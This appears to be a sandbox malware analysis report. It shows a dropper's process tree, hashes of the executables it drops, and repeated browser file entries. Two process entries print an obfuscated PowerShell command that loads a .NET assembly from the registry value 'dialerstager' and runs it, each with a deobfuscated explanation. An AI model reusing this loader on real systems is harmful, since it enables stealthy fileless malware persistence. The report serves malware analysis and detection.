C:\Users\Admin\AppData\Local\Temp\Windows.exe (level 3)
"C:\Users\Admin\AppData\Local\Temp\Windows.exe"
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Company\NewProduct\me.exe (level 2)
"C:\Program Files (x86)\Company\NewProduct\me.exe"
- Executes dropped EXE
-
C:\Windows\System32\CompPkgSrv.exe (level 1)
C:\Windows\System32\CompPkgSrv.exe -Embedding
-
C:\Windows\SysWOW64\WerFault.exe (level 1)
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 6448 -ip 6448
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE (level 1)
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
Deobfuscated (format-string and backtick obfuscation resolved): Set-Variable 6To ([type]"reflection.Assembly"); $Dlr4S = [type]"Microsoft.Win32.Registry"; [reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubKey("SOFTWARE").GetValue("dialerstager")).EntryPoint.Invoke($null,$null). It loads a .NET assembly stored in the registry value HKLM\SOFTWARE\dialerstager and runs its entry point, a fileless persistence stage; that value is the artifact to look for on an affected host.
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE (level 1)
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
Deobfuscated: the same registry-resident assembly loader as the 32-bit (SysWOW64) instance above, here run from the 64-bit PowerShell; it reads HKLM\SOFTWARE\dialerstager, loads it with [reflection.Assembly]::Load and invokes the entry point.
-
C:\Windows\System32\dllhost.exe (level 1)
C:\Windows\System32\dllhost.exe /Processid:{1ed870b7-3296-4ecc-831f-cf2ef46a34b3}
Downloads
-
C:\Program Files (x86)\Company\NewProduct\F0geI.exe
Filesize 178KB
MD5 8d24da259cd54db3ede2745724dbedab
SHA1 96f51cc49e1a6989dea96f382f2a958f488662a9
SHA256 42f46c886e929d455bc3adbd693150d16f94aa48b050cfa463e399521c50e883
SHA512 ec005a5ae8585088733fb692d78bbf2ff0f4f395c4b734e9d3bed66d6a73c2ee24c02da20351397768f2420c703ad47ffee785a2a2af455a000ab0e6620ec536
-
C:\Program Files (x86)\Company\NewProduct\MouseAtHome.exe
Filesize 107KB
MD5 41e7c847d8834ad0cfaea592afa75efd
SHA1 cd96962e2380d721c16c1a80d698e91b358d9381
SHA256 2f8315b053c200047ea8a92e138b0ed39ef86f3ed41d17eee1cf281f3f0ad1fa
SHA512 5eefeace1b4192edc12eefe0c4c7a99d75f8a2a7721cd320fad6eff2bd70a24d593c67ac4b40899f719f5becbf2880fb2e5453009f39a5e1e348adb1867885b0
-
C:\Program Files (x86)\Company\NewProduct\jshainx.exe
Filesize 107KB
MD5 2647a5be31a41a39bf2497125018dbce
SHA1 a1ac856b9d6556f5bb3370f0342914eb7cbb8840
SHA256 84c7458316adf09943e459b4fb1aa79bd359ec1516e0ad947f44bdc6c0931665
SHA512 68f70140af2ad71a40b6c884627047cdcbc92b4c6f851131e61dc9db3658bde99c1a09cad88c7c922aa5873ab6829cf4100dc12b75f237b2465e22770657ae26
-
C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe
Filesize 496KB
MD5 8f5056a3da7c93b60a5c0a9a9c26242c
SHA1 c67ee1d7e81f46a5c08b45dca6eb354af1ee7b8c
SHA256 8a631481dec5c4bfde1b90e812868a5edd093f44ebbb0625f91e6548c500ef67
SHA512 617a6d8c6f3d0497503f6a15bb53623638df98b6ffed7cdaf6d1af8a327f3043f8a04e491e98bbc123740cb2e7c63caf58d93c00ecfe4e60e9460942e98747f8
-
C:\Program Files (x86)\Company\NewProduct\me.exe
Filesize 286KB
MD5 29f986a025ca64b6e5fbc50fcefc8743
SHA1 4930311ffe1eac17a468c454d2ac37532b79c454
SHA256 766033bd59297068c74324bfffca88887a4f02588bac347e277644011fb6b090
SHA512 7af798f1480c18952597699189eff78d2ac638b40bffbc651954807b81d667207dd6d4ad073a787d40a423a15361d625f49b556109f998d2c56fa66d71c7268a
-
C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe
Filesize 245KB
MD5 b16134159e66a72fb36d93bc703b4188
SHA1 e869e91a2b0f77e7ac817e0b30a9a23d537b3001
SHA256 b064af166491cb307cfcb9ce53c09696d9d3f6bfa65dfc60b237c275be9b655c
SHA512 3fdf205ca16de89c7ed382ed42f628e1211f3e5aff5bf7dedc47927f3dd7ff54b0dd10b4e8282b9693f45a5ee7a26234f899d14bfd8eb0fd078b42a4ed8b8b4c
-
C:\Program Files (x86)\Company\NewProduct\real.exe
Filesize 289KB
MD5 84d016c5a9e810c2ef08767805a87589
SHA1 750b15c9c1acdfcd1396ecec11ab109706a945ad
SHA256 6e8bae93bead10d8778a8f442828aac20a0bd5c87cabe3f6d76282a9d47b7845
SHA512 7c612dd0f3eab6cb602c12390f62daa0e75d83433bcd4b682d1d5b931ebc52c8f6b32acd12474bdf6eecb91541dfa11cbbd57ca6cf8297ae9c407923e4d95953
-
C:\Program Files (x86)\Company\NewProduct\safert44.exe
Filesize 244KB
MD5 dbe947674ea388b565ae135a09cc6638
SHA1 ae8e1c69bd1035a92b7e06baad5e387de3a70572
SHA256 86aeac2a4ee8e62265ee570718bbd41a4e643e0bad69e7b4fa6c24baeb220709
SHA512 67441aebbf7ce4d53fbb665124f309faed7842b3e424e018454ff6d6f790219633ce6a9b370aeaf77c5092e84f4391df13e964ca6a28597810dee41c3c833893
-
C:\Program Files (x86)\Company\NewProduct\tag.exe
Filesize 107KB
MD5 2ebc22860c7d9d308c018f0ffb5116ff
SHA1 78791a83f7161e58f9b7df45f9be618e9daea4cd
SHA256 8e2c9fd68fc850fa610d1edfd46fc4a66adbef24e42a1841290b0e0c08597e89
SHA512 d4842627f6fab09f9472ed0b09b5e012524bf6b821d90a753275f68de65b7ba084a9e15daca58a183f89b166cc9d2d2f2d6a81e1110e66c5822b548279c8c05e
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53
Filesize 412B
MD5 fabca4dec1c687d871641bbe0dd59a81
SHA1 fa6aecb28d5a2c64fdccfe4ae4c7464b49ab5ed9
SHA256 f11a8e815b1084bceacf4f17479ee5c44c39796f3bee030cf3f25426158061f9
SHA512 6c4ad4e7d5a1d3a33ab5343bb806a2bfa3ac4c4e9040159f95342a0688235c4998b2fb5ad2d0eab17a20290cbd5facf449e5fa938d36c71f53479ac5f5839519
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
Filesize 152B
MD5 39d33ed8e39d48cbbe10137b840a938a
SHA1 af463ffd0fe9508fb7c71585709eaada860626bc
SHA256 d2dd2e1482b5a8808b7a88a8979fa6ad2ded1a99a0b6c83ddcc3004261d01451
SHA512 18c96d2add074aaa3dd470ba01f104be0f107d51417bc8c8a609f69a444e598049b3fbe4d2a84f29b7e59e0aa5de474655735418d2838e8efe20aa675b96f6bc
SHA1af463ffd0fe9508fb7c71585709eaada860626bc
SHA256d2dd2e1482b5a8808b7a88a8979fa6ad2ded1a99a0b6c83ddcc3004261d01451
SHA51218c96d2add074aaa3dd470ba01f104be0f107d51417bc8c8a609f69a444e598049b3fbe4d2a84f29b7e59e0aa5de474655735418d2838e8efe20aa675b96f6bc
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD539d33ed8e39d48cbbe10137b840a938a
SHA1af463ffd0fe9508fb7c71585709eaada860626bc
SHA256d2dd2e1482b5a8808b7a88a8979fa6ad2ded1a99a0b6c83ddcc3004261d01451
SHA51218c96d2add074aaa3dd470ba01f104be0f107d51417bc8c8a609f69a444e598049b3fbe4d2a84f29b7e59e0aa5de474655735418d2838e8efe20aa675b96f6bc
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD539d33ed8e39d48cbbe10137b840a938a
SHA1af463ffd0fe9508fb7c71585709eaada860626bc
SHA256d2dd2e1482b5a8808b7a88a8979fa6ad2ded1a99a0b6c83ddcc3004261d01451
SHA51218c96d2add074aaa3dd470ba01f104be0f107d51417bc8c8a609f69a444e598049b3fbe4d2a84f29b7e59e0aa5de474655735418d2838e8efe20aa675b96f6bc
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD5c4f48398fdb31b8bd84eadac9ddf5acc
SHA156bc7ec79f71a6f609e12c1c8ca68c9a83c352e5
SHA2568acec190b9fa36a48e95fa130737ceb06cb498c771ff6874ebc47da5825d1746
SHA51216b756eae47dae99f48803625c7a0c30e306a76c27578c829cccf32c9cb52df0aea32bc92d07c7b18fe249cf4fa443e2365d07f0bec4bf47f97af762b7ab3b94
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD5c4f48398fdb31b8bd84eadac9ddf5acc
SHA156bc7ec79f71a6f609e12c1c8ca68c9a83c352e5
SHA2568acec190b9fa36a48e95fa130737ceb06cb498c771ff6874ebc47da5825d1746
SHA51216b756eae47dae99f48803625c7a0c30e306a76c27578c829cccf32c9cb52df0aea32bc92d07c7b18fe249cf4fa443e2365d07f0bec4bf47f97af762b7ab3b94
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD5c4f48398fdb31b8bd84eadac9ddf5acc
SHA156bc7ec79f71a6f609e12c1c8ca68c9a83c352e5
SHA2568acec190b9fa36a48e95fa130737ceb06cb498c771ff6874ebc47da5825d1746
SHA51216b756eae47dae99f48803625c7a0c30e306a76c27578c829cccf32c9cb52df0aea32bc92d07c7b18fe249cf4fa443e2365d07f0bec4bf47f97af762b7ab3b94
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD5c4f48398fdb31b8bd84eadac9ddf5acc
SHA156bc7ec79f71a6f609e12c1c8ca68c9a83c352e5
SHA2568acec190b9fa36a48e95fa130737ceb06cb498c771ff6874ebc47da5825d1746
SHA51216b756eae47dae99f48803625c7a0c30e306a76c27578c829cccf32c9cb52df0aea32bc92d07c7b18fe249cf4fa443e2365d07f0bec4bf47f97af762b7ab3b94
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD5c4f48398fdb31b8bd84eadac9ddf5acc
SHA156bc7ec79f71a6f609e12c1c8ca68c9a83c352e5
SHA2568acec190b9fa36a48e95fa130737ceb06cb498c771ff6874ebc47da5825d1746
SHA51216b756eae47dae99f48803625c7a0c30e306a76c27578c829cccf32c9cb52df0aea32bc92d07c7b18fe249cf4fa443e2365d07f0bec4bf47f97af762b7ab3b94
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD5c4f48398fdb31b8bd84eadac9ddf5acc
SHA156bc7ec79f71a6f609e12c1c8ca68c9a83c352e5
SHA2568acec190b9fa36a48e95fa130737ceb06cb498c771ff6874ebc47da5825d1746
SHA51216b756eae47dae99f48803625c7a0c30e306a76c27578c829cccf32c9cb52df0aea32bc92d07c7b18fe249cf4fa443e2365d07f0bec4bf47f97af762b7ab3b94
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD5c4f48398fdb31b8bd84eadac9ddf5acc
SHA156bc7ec79f71a6f609e12c1c8ca68c9a83c352e5
SHA2568acec190b9fa36a48e95fa130737ceb06cb498c771ff6874ebc47da5825d1746
SHA51216b756eae47dae99f48803625c7a0c30e306a76c27578c829cccf32c9cb52df0aea32bc92d07c7b18fe249cf4fa443e2365d07f0bec4bf47f97af762b7ab3b94
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD5c4f48398fdb31b8bd84eadac9ddf5acc
SHA156bc7ec79f71a6f609e12c1c8ca68c9a83c352e5
SHA2568acec190b9fa36a48e95fa130737ceb06cb498c771ff6874ebc47da5825d1746
SHA51216b756eae47dae99f48803625c7a0c30e306a76c27578c829cccf32c9cb52df0aea32bc92d07c7b18fe249cf4fa443e2365d07f0bec4bf47f97af762b7ab3b94
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD5c4f48398fdb31b8bd84eadac9ddf5acc
SHA156bc7ec79f71a6f609e12c1c8ca68c9a83c352e5
SHA2568acec190b9fa36a48e95fa130737ceb06cb498c771ff6874ebc47da5825d1746
SHA51216b756eae47dae99f48803625c7a0c30e306a76c27578c829cccf32c9cb52df0aea32bc92d07c7b18fe249cf4fa443e2365d07f0bec4bf47f97af762b7ab3b94
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
2KB
MD52f73e33c893c7edfdae0ebc712927aaa
SHA1704d982052896624c9450e5472d68962e2a6cab5
SHA2569fa9dfa0f8f4a276950c8b2453239c3b9d2143d83218b6a87b146ed0ad0e5cf4
SHA5128a0589673db0c564ed42b320805d5ce24873d8a118b70a93cad115eb8767ec5cf7ee74187b3411ab3adcacdde28d091349b23535b053113a1a24a592b99b2817
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
2KB
MD50026267da24628517d189b842d68e0d0
SHA1e9958b59bbd6c2184651d0a5ca649cc9f2c50b8d
SHA256fc1a2ecff18136a7cccddae2788680528fc7a13677c13f0db1229b510b6beb15
SHA512d2a17040eea801e3b699c043383b868dd963584fb86ede44f549eb42b9a678a67519d6a9641d5c173e51df69495d44f7eb21799e9567f74202be8582358a5c91
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
2KB
MD51a2b74cc7f478054ee6a937019c333a8
SHA149ababc7d64e91c5c99d2c6223e3841817b1ad54
SHA25640a45e184f29b8d8f5b4c21822adad798630dbf376b1196f041d5f3122669f76
SHA512e27af5670d22c7302e33bc899eb87b58e40344c6a5810906e3846ad8e063e520f581276c088f718991c8c9cbf5ce3b394c5d7bac5b242aa5cde324fe3d77ffed
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
2KB
MD5fb37da1a0c63fad655849b861e76d1d5
SHA1bf7ab5134a6a026b53dabf434129150ed877d8cc
SHA2566b15c04cd82a85f653fbcdbe7bf3a4d185eaf7412cc17ce8aab500350c291d2d
SHA512eb3ae0518452b6da3c5510b154d2601a7f7ec9805a1e63c41f564eab6b8e707601617954f51a39e3be86400d1efbd706314a9f6b8b1e3d5b1758c49b700bc16d
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
2KB
MD5ad26d00b34a741087188720cf0a57658
SHA17ee453316fac9ad8798df00d90745a8df4550f86
SHA2563f1e64f276b1e72e0c63deed7f03828c400624e3b91f3c6d73e34012492858c5
SHA51273f5771d672e5243f80c820fcfcbee741dabcf1ffb633106eac695fe19cc1de986913501b4643ede30118e914eef24fbe6de08d24b579e7ee5cd6fc45bcb2420
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
2KB
MD56d55901933eb93d50753237ca8d8b2a9
SHA115b5642a456c63c6bc1c94282a176b88166a104c
SHA256b87ab91b4c884c04b1a74268893d0ef7a4af92c5dee8a113c3266f5e2a01c2b2
SHA51250d543c940c7d35ffbdca56ed6d12864432b17b651751659c7970e8e6ac0880494657687842fa1fe895c2dd28289086763c772bd3ac55995bae99a3b14f5d6b8
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
2KB
MD52303ea8c6ba101bb3327f65d654603a2
SHA1a3561fbb005e222c732ed5bcc18df980b6d1ffc6
SHA2566d752d25aa2a201fc1ff8e3ac3ddaecf525dfbf29b8e343096dcc19d06b92e6c
SHA512453630e0107f3bb498db16478867fdb4b7b946a2ad9d99d62d4955d56d83d0503c6882b1814c1af3e28898efe68eac972a886515f1393a6b2ef7e7b979fa09f7
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
2KB
MD5fb37da1a0c63fad655849b861e76d1d5
SHA1bf7ab5134a6a026b53dabf434129150ed877d8cc
SHA2566b15c04cd82a85f653fbcdbe7bf3a4d185eaf7412cc17ce8aab500350c291d2d
SHA512eb3ae0518452b6da3c5510b154d2601a7f7ec9805a1e63c41f564eab6b8e707601617954f51a39e3be86400d1efbd706314a9f6b8b1e3d5b1758c49b700bc16d
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
2KB
MD52303ea8c6ba101bb3327f65d654603a2
SHA1a3561fbb005e222c732ed5bcc18df980b6d1ffc6
SHA2566d752d25aa2a201fc1ff8e3ac3ddaecf525dfbf29b8e343096dcc19d06b92e6c
SHA512453630e0107f3bb498db16478867fdb4b7b946a2ad9d99d62d4955d56d83d0503c6882b1814c1af3e28898efe68eac972a886515f1393a6b2ef7e7b979fa09f7
-
-